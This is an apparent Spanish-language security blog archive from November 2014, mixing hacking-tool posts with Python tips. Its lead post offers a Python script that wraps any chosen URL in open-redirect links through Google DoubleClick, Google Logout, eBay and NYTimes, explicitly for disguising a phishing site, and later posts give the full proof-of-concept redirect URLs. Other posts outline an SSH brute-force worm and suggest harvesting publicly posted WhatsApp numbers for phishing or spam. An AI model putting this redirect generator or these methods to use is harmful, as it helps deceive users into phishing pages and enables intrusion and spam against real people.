domingo, 30 de noviembre de 2014

Automatizando El Url Redirection con #Python, No Iba A Ser Menos.

Hace ya unos días hablé de los diferentes [redirects debido a que Google] no comprobaba la redireción en en GoogleDoubleClick.net. Lo cual [afectaba a Ebay y al Nytimes] y o he aprovechado para crear otro script para que, una vez construido nuestro phishing y subido algún servidor, podamos redirecciónar la url que queramos.


Aquí tenéis es script como es de menester: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys

def Google(url):
#Google
re1 = "http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl="+url
re2 = "http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl="+ url
redirects =[re1,re2]
guardar(redirects)
def Google2(url):
#Google2
re3 = "https://www.google.com/accounts/ServiceLogin?continue=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl="+ url +"/essaybeans/reflections/solitude.html"
re4 = "https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl=" + url
redirects =[re3,re4]
guardar(redirects)
def Google3(url):
#Google3
re5 = "http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1OTI4NzkxMzM3&forward="+ url
re6 = "http://cm.g.doubleclick.net/pixel?google_nid=rfi&google_cm&google_sc&google_hm=Njk4NjIwODk1ODY0NDM1NzM2&forward="+ url
redirects =[re5,re6]
guardar(redirects)
def Google4(url):
#Google4
re7 = "https://www.google.com/accounts/Logout?service=wise&continue=http://googleads.g.doubleclick.ne/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl="+ url
redirects =[re7]
guardar(redirects)
def Ebay(url):
#Ebay
re8 = "http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CÑRHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=" + url
redirects =[re8]
guardar(redirects)
def nytimes(url):
#nytimes
re9 = "http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http://ad.doubleclick.net/ddm/clk/279541164;106630011;s?"+ url +"?-inclusive.php?utm_source=nyt&utm_medium=display&utm_content=clicktracker&utm_campaign=300x250_ExpectMore_NYT_NYRegion"
redirects =[re9]
guardar(redirects)
def GoogleLogout(url):
#Google Redirect&logout
re10 = "https://www.google.com/accounts/Logout?service=wise&continue=http://googleads.g.doubleclick.net/aclk?sa=L&ai=CtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU&num=0&sig=AOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA&client=ca-pub-0466582109566532&adurl="+url
redirects =[re10]
guardar(redirects)
def Lucky(url):
#"I'm Feeling Lucky"
re11 = "https://www.google.com/#&q="+ url +"&btnI=denoqa"
redirects =[re11]
guardar(redirects)

def guardar(item):
g1 = open("urls.txt",'w')
for redirect in item:
g1.write(redirect +"\n")
print "Done"  

if __name__ == "__main__":
d1 = raw_input("""
_________________________________________________________
|                                                         |
| Redirect NOW                                            |
| Select one Redirect:                                    |
|         1- Google: 2 redirects                          | 
|         2- Google2: 2 redirects                         |
|         3- Google3: 2 redirects                         |
|         4- Google4: 1 redirect                          |
|         5- GoogleLogout: 1 redirect + logout google     |
|         6- Ebay: 1 redirect                             |
|         7- nytimes: 1 redirect                          |
|         8- Lucky: 1 redirect                            | 
|_________________________________________________________|

Write redirect number: """)

if d1 == "1":
d2 = raw_input("Write url: ")
Google(d2)
elif d1 == "2":
d2 = raw_input("Write url: ")
Google2(d2)
elif d1 == "3":
d2 = raw_input("Write url: ")
Google3(d2)
elif d1 == "4":
d2 = raw_input("Write url: ")
Google4(d2)
elif d1 == "5":
d2 = raw_input("Write url: ")
GoogleLogout(d2)
elif d1 == "6":
d2 = raw_input("Write url: ")
Ebay(d2)
elif d1 == "7":
d2 = raw_input("Write url: ")
nytimes(d2)
elif d1 == "8":
d2 = raw_input("Write url: ")
Lucky(d2)
else: 
print "That's imposible"

Por si no lo he explicado el funcionamiento bien o no lo entendisteis del todo. He grabado este vídeo para que todo quede mas claro. 


Si os queréis descargar este script o hacer algún commit aquí os dejo mi GitHub:


Sed Buenos con esto 0;) 

sábado, 29 de noviembre de 2014

#Python Cheat Sheet & Cubo

Hace unos días que salió el siguiente Cheat Sheet de Python, muy bueno en mi opinion aunque le quedarían especificar, a mi gusto, las funciones. Pero es buen Cheat Sheet.

Aunque yo no me he sabido estar quiero y con un poco del magia del PAINT he hecho un "Dado" o cubo con la información mas básica de este CheatSheet.  Espero que os guste y se que es una chorrada pero yo lo tengo impreso y montado en mi habitación y la verdad es que me gusta mucho revisarlo.


Sed Buenos ;) 

viernes, 28 de noviembre de 2014

+ Dame Tu Telefono - Ni loco + Pues Dame Tu #Whatsapp - Ah, eso si.

Hace unos días volví a oír, estando por la calle, la conversación absurda sobre no dar el numero del teléfono pero si el numero de whatsapp, que no deja de ser el mismo. Bueno, si un comentario que vi un día como "broma" por Internet ha llegado a la calle es que debe haberse hecho famoso. 


Así que me he puesto a buscar por Google haber si alguna alma en pena había dejado su teléfono colgado en Internet. La primera búsqueda dio como resultado la pagina de contactos de MilAnuncion.com donde la gente puede dejar su "whatsapp" para buscar mujer o lo que surja.

Pero tampoco ponen mucho reparo en proteger esta información o en poner un correo electrónico y solo hace falta hacer clic en contactar para obtener el teléfono. Ademas el anuncio es de hoy xD y el de abajo de hace 3 minutos a este ritmo nos hacemos con todos los móviles de España


Después de haber visto que la gente esto de la privacidad no lo tienen muy claro he buscado por la Red Social Facebook a ver que encontraba y el resultado no ha podido ser mejor. Se ve que hay un seguido de pagina llamadas "Yo tengo Whatsapp" en las cuales la gente comparte su "numero whatsapp" a saco. 




Cristian repite xD


Hay gente que no da mas. 

Bueno, sabiendo todos estos números de teléfono, agregarlos a nuestros contactos y montarnos una buena campana de pishing y/o Spam solo nos costaría una tarde y un poco de imaginación. Por favor no se lo dejéis a los malos tan fácil. 

Sed Buenos con esto 0:)

jueves, 27 de noviembre de 2014

Pompem Busca Tu Exploit Favorito (Si, #Python Otra vez xD)

Hace mucho que tenia esta herramienta en mi "carpeta para trabajar" y la verdad es que ya que la he tenido que rescatar por motivos personales, he decidido explicaros como funciona.

Pompem es una herramienta hecha por Relax Labs y escrita en Python para buscar exploits en las bases de datos mas conocidas, como por ejemplo: Exploit-db, 1337day, Packetstorm Security... Aunque, también tenéis una versión web escrita en PHP por si no tenéis una idea muy concreta. 

Versión web de Pompem

La web funciona como buscador, solo hace falta poner lo que queramos vulnerar y aparecerán los exploits correspondientes. Esta bien si quieres ir mirando de uno en uno pero, no nos agiliza nada el trabajo. 


La verdad es que la versión en Python es mucho mas divertida ya que podremos hacer una búsqueda y descargarnos todos los exploits referentes a esa búsqueda. Veamos un poco el Usage del script: 


Como veis no somos podemos hacer un get de exploit sino que podremos exportar la buesqueda en un txt o en un html para llevarnos trabajo a casa. Si hacemos un pompem.py -h obtendremos mas o menos la misma explicación que en el Usage. 


Si hacemos, por ejemplo, una búsqueda a exploits para Windows y los exportamos a html y a txt se nos creará un archivo out.html o out.txt respectivamente. 


Si abrimos el archivo .html:


Si abrimos el archivo .txt: 


A mi personalmente me gusta mas la versión en txt y encima ocupa menos. Pero tener un txt o html como log de búsquedas tampoco es una mala idea para llevar un seguimiento de las búsquedas que has hecho. 

Lo unico malo que le puedo sacar a este script es que tarda un poco en empezar a realizar ciertas acciones y la verdad es que, abriendo el codigo en la funcion maim. esta programado de una forma que se parece mucho a Javascript y no creo que sea sea la mejor forma de hacer un main. (Ojo tampoco es que yo sea un gran programado, solo digo que lo haria de otra manera.)

Me refiero a esto: 

La verdad es el único punto en el cual yo le podría sacar algo de puntilla pero no por esto, Pompem, deja de ser un script muy útil y bien programado. 

Para los que queras mas información os dejo el blog de uno de los creadores aquí:

Os podéis descargar la herramienta desde su repositorio en GitHub:
Sed Buenos con esto 0;) 

Simulación De Un Worm SSH (#Python Of course)

Hoy rebuscado por paginas que tenia un poco olvidadas en los mas oscuro de mis marcadores, me he encontrado una entrada sublime sobre la creación de un Gusano/Worm para SSH utilizando Python. 


Limitando un poco hoy la introducción y poniéndome directamente en el tema, para poder inyectar este malware en a través del protocolo SSH harian falta tres puntos:
1. Analizar una nueva dirección IP y si SSH está funcionando oportunidad y fuerza bruta el usuario / contraseña
2. Si el gusano tiene éxito, a continuación, subir una copia de sí mismo con el host
3. Ejecute la copia, por lo que ahora puede escanear y hacer (1) - (3)
El creador del Worm simplifica estos tres puntos en las siguientes dos funciones: 
1. SSHDictionaryAttack ()
2. UploadAndExecute ()
Para atacar a SSH utiliza [la librería paramiko] para hacer un ataque de fuerza bruta a SSH2 pasandole un diccionario. (¿que, a que ahora veis mas guay el script de ayer? xD)

Código de esta función:
Después solo harria falta crear un directorio en la maquina de la victima utilizando el SSH que hemos vulnerado para colar nuestro gusano. 

Código de función UploadAndExecute:
El autor no revela el codigo del Worm pero si que deja muchísimas pistas de como hacerlo. Así que os dejo la fuente de esta entrada:



Aquí tenéis una PoC para que veáis que realmente funciona el el gusano se replica:


Sed Buenos con esto 0;) 

martes, 25 de noviembre de 2014

PdftoText + Python = Diccionario v2.0

Como os comenté [en el vídeo de ayer] al script, que cree para hacer slipt de palabras de un txt y guardarlas en lineas para crear diccionarios, le faltaban unos cuantos retoques. Por ejemplo, quitar prints absurdos, incluirle un bucle while para poderle pasar txts de una forma mas ágil y/o hacer funciones. 


Así que me he puesto a ello después de hacer todos mi "que haceres" de hoy y la verdad es que estoy contento con el resultado. Sigue siendo un script algo cutre, pero estoy orgulloso.

def abrirguardar(txt):
with open(txt,'r') as f:
for line in f:
for word in line.split():
if word + "\n" in comp:
pass
else:
dic.write(word+"\n")
print "Done"   

while True: 
d1 = raw_input("Dame el archivo: ")
dic = open("dicslipt.txt","a+")
comp =[]
for word in dic:
comp.append(word) 
abrirguardar(d1)  

Descarga: 
Como veis ahora el script es capaz de abrir, leer y crear una lista con cada palabra del archivo dicslipt.txt. La cual, después utilizaremos para general la condición if word + "\n" in comp: para que, en el caso de que sean palabras iguales no las vuelva a escribir. 

Pues, aquí lo tenéis y espero que os sirva mucho.

Sed Buenos ;)  

lunes, 24 de noviembre de 2014

PdftoText + Python = Diccionario

Hoy me he puesto a jugar con Pdf to Text un programa bien junto [a la suit xPDF] capaz de extraer texto de un archivo.pdf y devolverlo en un .txt. Hasta aquí todo bien, ya que es un programa muy fácil de utilizar y da muy buenos resultados. 

El Usage  de pdftotext es bastante sencillo.

Así que, una vez que ya tenia el .txt con el texto que quería, pensé en que seria muy guay poder ordenar por lineas cada una de las palabras y poder hacer un diccionario con ellas. Así que me he puesto a investigar para poder hacerlo en Python. 

Este es el script que ha salido:

d1 = raw_input("Dame el archivo: ")

with open(d1,'r') as f:
    for line in f:
        for word in line.split():
           dic = open("dicslipt.txt","a+")
           dic.write(word + "\n")
           print word
    print "split done"

Si os lo queréis descargar esta en mi GitHub: 
Se puede mejorar de muchas maneras, asi que dejo en vuestras manos los posibles commits y por si no os ha quedado claro el proceso que he utilizado para crear este un diccionario.txt gracias archivos .pdf aquí os dejo el vídeo que he grabado esta tarde. 


Sed Buenos con esto 0;) 

domingo, 23 de noviembre de 2014

Imagen.- ¿Y Tu De Quien Eres?

Hoy ha sido una tarde muy bien aprovechada ya que hemos estado programando con el amigo Snifer una App para Android y Firefox OSque a los usuarios de Python o a los mas noveles seguro que os va a gustar. 



Así que mientras Snifer me estaba diciendo que me tenia que leer [la guía del developer] de Firefox OS, he encontrado esta imagen que, aparte de hacerme mucha gracia, resulta bastante cierta. 


Sed Buenos y pensad en si es o no verdad esta imagen. ;) 

sábado, 22 de noviembre de 2014

#Python .- Jugando con Archivos y Directorios.

Hoy he estado todo el día laido con un problema con mi driver de la tarjeta de red y la nueva actualización de Windows y no me ha dado tiempo a hacer la entrada que tenia pensada para hoy referente a evento [RetroBarcelona] que se esta haciendo en Barcelona este fin de semana.  Pero como igualmente iba a ser una entrada dedicada a la programación, hoy os voy a dar unos cuantos tips para trabajar con archivos y directorios. A mi me han ayudado mucho a trastear con Python y espero que a vosotros también os ayuden. 



Para buscar todos los archivos con una extensión, por ejemplo .jpg:

import glob
lista = glob.glob("*.jpg")

Para listar todos los archivos de un directorio:

import os
ficheros = os.listdir('/home/alumno/ejercicios/python') # linux
ficheros = os.listdir(r'c:Documents and SettingsalumnoEscritorioejerciciospython') #windows: cuidado con el caracter

Directorio actual:

os.getcwd()
os.curdir

Tipos de ficheros

print michero, 'es un',
if os.path.isfile(mifichero):
          print 'fichero'
if os.path.isdir(mifichero):
          print 'directorio'
if os.path.islink(mifichero):
          print 'enlace'

Último acceso a un fichero

ultimo_acceso = os.path.getatime('foto.jpg')
ultima_modificacion = os.path.getmtime('foto.jpg')
tiempo_en_dias = (time.time()- ultimo_acceso)/ (60*60*24)
print tiempo_en_dias

Eliminar ficheros y directorios

os.remove('mifoto.jpg')
for foto in glob.glob('*.jpg') + glob.glob('*.tif'):
             os.remove(foto)

Eliminar directorio:

import shutil
shutil.rmtree('midirectorio')

Copiar y renombrar ficheros

import shutil
shutil.copy(mifichero, copiafichero)

# copia también tiempo de último acceso y última modificación
shutil.copy2(mifichero, copiafichero)

# copia un árbol de directorios
shutil.copytree(raiz_de_directorio, copia_directorio)

Manipulando los paths y nombres

Rutas

>>> os.path.split('/home/alumno/python/ejercicios/ej1.py')
('/home/alumno/python/ejercicios', 'ej1.py')
>>> os.path.basename('/home/alumno/python/ejercicios/ej1.py')
'ej1.py'
>>> os.path.dirname('/home/alumno/python/ejercicios/ej1.py')
'/home/alumno/python/ejercicios'

Extensiones

>>> os.path.splitext('pelicula.avi')
('pelicula', '.avi')

Crear y moverse entre directorios

directorioOriginal = os.getcwd()
directorio = os.path.join(os.pardir, 'miNuevoDir')
if not os.path.isdir(directorio):
            os.mkdir(directorio)
os.chdir(directorio)
...
os.chdir(directorioOriginal) # vuelve al directorio inicial
os.chdir(os.environ['HOME']) # cambia al directorio home


Fuente: 
Sed Buenos ;) 

Lynis 1.6.4.- Auditando nuestros Linux & Unix

Una vez mas, os voy recomendar una herramienta pero la mayoría de veces os hablo de software para auditar a otro sistemas y no os he hablado de herramientas para auditar nuestra propia maquina. Por eso hoy tenemos a Lynis un programa capaz de hacer auditorias de sistemas Linux y Unix (Recordemos que Mac también es un sitema Unix así que, esta herramienta también sirve para el).


Lo que  Lynis hace:
  • La auditoria de seguridad
  • Análisis de vulnerabilidad
  • Endurecimiento del sistema
Mas información y descarga de la herramienta: 

jueves, 20 de noviembre de 2014

¿Mi USB Es Vulnerable a BadUSB? ¡Miralo En La Wiki!

Os acordáis que hace mucho [os hable de una vulnerabilidad llamada BadUSB] bastante severa, pues sigue en vigencia hasta día de hoy. Así que es muy posible que el dispositivo que utilicemos dia a dia para transportar nuestros datos sea propenso a esta vulnerabilidad. Pero, la comunidad se ha puesto las pilas y ha sacado una Wiki donde van actualizando diferentes dispositivos que han sido desensamblados por la comunidad e indicado la posibilidad de que sea vulnerable, especificando : marca, serie, tipo de dispositivo, etc. 


Aquí os dejo el enlace por si queréis mirar si alguno de los dispositivos allí expuestos cuadra con los que utilizáis: 
Sed Buenos ;) 

miércoles, 19 de noviembre de 2014

¡Default Router Passwords A Mogollón!

Muchísimas veces, en casa de amigos que te dan su contraseña del wifi, en puntos de acceso a Internet sin protección o con protección sucesible a ataques, seguro que os habéis puesto a mirar a ver que panel web había en la gateway de la red interna y habéis deseado tener las claves por defecto del router en cuestión.  Pues nada,  ahora ya solo hace falta hacer una búsqueda en Google llegar a la pagina web de [RouterPasswords] y buscarla marca del modelo

Si queréis curiosear la pagina os dejo en enlace: 
Sed Buenos con esto y no lo uséis para el mal. 0;)

martes, 18 de noviembre de 2014

Redireccionando Nuestro Phishing Desde eBay y NYtimes Gracias A Google DoubleClick.net

La [vulnerabilidad en Google DoubleClick.net] ha dado para mucho en estos días y gracias a el no solo podemos forzar un logout y redirigirlo desde Google sino que podemos hacerlo desde eBay y NYtimes pero doliéndonos del logout. Esto abre mucho el abanico de posibles lugares para colar un phishing. 

eBay Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net:

  • Url de la PoC:
    • http://rover.ebay.com/rover/1/711-67261-24966-0/2?mtid=691&kwid=1&crlp=1_263602&itemid=370825182102&mpre=http://googleads.g.doubleclick.net/aclk?sa=L%26ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV%26num=0%26sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ%26client=ca-pub-0466582109566532%26adurl=URLQUETEINTERESEREDIRECIONAR
  • Video de la PoC:

The New York Times (Nytimes.com) Covert Redirect Vulnerability Based on Google Doubleclick.net


  • Url de la PoC: 
    • http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3FURLQUETEINTERESEREDIRECIONAR%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion
  • Video de la PoC: 

Como habéis podido ver en los videos, estos dos redirecs al ser pegados en facebook muestran la pagina a la que es redirigida. Pero, sirven igualmente.

No os fieis de ninguna url, miradla siempre con cuidado.

Sed Buenos con esto  0;) 

lunes, 17 de noviembre de 2014

Exámen: SEGURIDAD EN INTERNET Y HACKING

Bueno, ya que ya han pasado casi dos meses desde la formación que impartí en la cual utilice todo el Pack de Slide que he ido subiendo este año en este blog. Así que, os libero el examen que les hice a mis alumnos a ver que nota sacáis y así también me da por jugar con nuevos servicios para hacer examenes y asignaturas . 

Aquí tenéis el examen: 



Sed Buenos y Sacad nota ;)

domingo, 16 de noviembre de 2014

GoogleDoubleClick, Zedo y El Malvertising.

Ayer después de escribir aquí sobre el problema de [redirecionamiento de Google] que fue encontrado hace unos días, me puse a buscar si había alguna noticia relacionada con esta vulnerabilidad. Así ha sido, el día 18 de septiembre en el blog de Malwarebytes se hizo eco de un ataque de Malversiting que se estaba produciendo a través del ya conocido Google DoubleClick y Zedo que es una agencia de publicidad. 

Para los que no sepias lo que es un ataque de Malvertising es simplemente el uso ilícito de la publicidad online para distribuir malware. Así que, como GoogleDoubleClick se fia de las agencias de publicidad y Zedo esta comprometido se facilita la faena al distribuidor de Malware.

Así funciona el ataque: 


Claro, teniendo el método para colar malware habrá algún bicho, suelto o detectado, utilizándolo. Este "bicho" se llama [Zemot un malware capaz de descargar otros tipos de malware] y ademas enviar spam con las cuentas de la victimas. 

Así actúa este Malware: 


Uno de los sitios afectados fue la famosa web de last.fm y se cuentan muchas paginas mas. Si queréis sabes cuales y profundizar mucho mas os dejo el enlace a la fuente de esta noticia. 
Sed Buenos ;) 




sábado, 15 de noviembre de 2014

PoC Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

Ayer por la noche, antes de irme a dormir, decidí pasarme un poco por [seclists.org] y me encontré con un hilo de Wang Jing donde hablaba de un Bypass para saltarse la lista blanca de google que limita las redirecciones.


Cuando un usuario es redireccionado desde Google a otro sitio, Google comprueba si la URL redirigida pertenece a los dominios en la lista blanca de Google (Esta lista blanca contiene generalmente sitios web pertenecen a Google), 

Pero, si la dirección de uno de estos dominios de lista blanca no nos comprobadas el usuario podría redireccionar la url que quisiera a Google. Esto ayudaría mucho al mundo del Phising ya que podríamos montarnos una web y hacer que picaran ya que estaríamos mostrando una url de Google y ademas forzar un LogOut al usuario. 

Por ejemplo, Googleads.g.doubleclick.net que [es el servició para cuantificar los click de AdSense] no revisa la redirección asi que podríamos montar una url para forzar un deslogueo e insetar nuestra página.

PoC: 
  • https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Finfostatex.blogspot.com

Mas información: 
Por si la explicación ha quedado un poco rara y ya que el señor Snifer tenia razón y tendría que añadir algunas PoC a mis artículos, ayer por la noche gravé un par de videos para que se entendiera mejor este ByPass.

  • PoC Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net:


  • PoC Bypass Google Open Redirect Filter Lucky Trick de Nick Semenkovich utilizando "Voy a tener suerte" 
    • Url de la vuelnarabilidad: 
      • https://www.google.com/#&q=SomeUniqueLongStringHere&btnI=denoqa



Sed Buenos con esto 0;) y espero que os hayan gustado las PoC. 

viernes, 14 de noviembre de 2014

Video.- Eleven Paths y Las Nuevas Tendencias En Ciberataques

Ayer, como supongo que ya visteis, no hubo entrada debido a que me encontraba bastante mal y preferí ir a dormir antes para levantarme bien hoy. Así ha sido y aunque guardo un leve dolor de cabeza eso no me ha impedido ponerme a repasar o a mirar vídeos relacionados con la seguridad informática mientras practicaba un poco de reversing.

 La verdad es que me he encontrado con bastantes bueno paro creo que este de Eleven Paths os gustará mas ya que hablan muy bien de las nuevas formas que tienen los malos de atacar, tanto a gente normal como a empresas, con un tono bastante distendido. Siento que vuelva a ser un vídeo del hombre del gorro pero así me aseguro de que también conocéis a Pablo González.


Sed Buenos y yo vuelvo a tomarme mis medicinas.

miércoles, 12 de noviembre de 2014

Combate La Vista Cansada Con f.lux

Supongo que la gran mayoría de los que leéis esta blog os pasáis bastante rato delante de la pantalla delo ordenador y seguramente muchas veces o a dado dolor de cabeza por culpa de la luz del monitor. Pues hace una semana que probé el programa f,lux el cual adecua el tipo de luz de tu pantalla a la hora que es. Así que por la mañana sera mas brillante o mas blanca y por la noche tomará el tono de una lampara halógena. 


Me parece una herramienta genial y ya se que hoy la entrada no va de seguridad informática pero creo que esto os ayudará a todos con vuestros dolores de cabeza. Así ahorrareis en medicinas. 

Información y descarga de la herramienta: 
Sed Buenos ;) 

martes, 11 de noviembre de 2014

WAP.- Web Application Protection En PHP

Hace unos días leí un articulo de [Undercode sobre la prevención de ataques XSS] en diferentes lenguajes y pensé en que se podría hacer una herramienta que, una vez acabaras tu pagina web pudieras pasarla para ver si estaba segura o aplicarle los filtros que tocara. Pero,  como siempre, se me han adelantado. 


WAP detecta automáticas y corrige vulnerabilidades de validación de entrada en aplicaciones web escritas en PHP Lenguaje (versión 4.0 o superior) y con una baja tasa de falsos positivos.

WAP detecta las siguientes vulnerabilidades: 

- SQL injection using MySQL, PostgreSQL and DB2 DBMS
- Reflected cross-site scripting (XSS)
- Stored XSS
- Remote file inclusion
- Local file inclusion
- Directory traversal
- Source code disclosure
- OS command injection
- PHP code injection

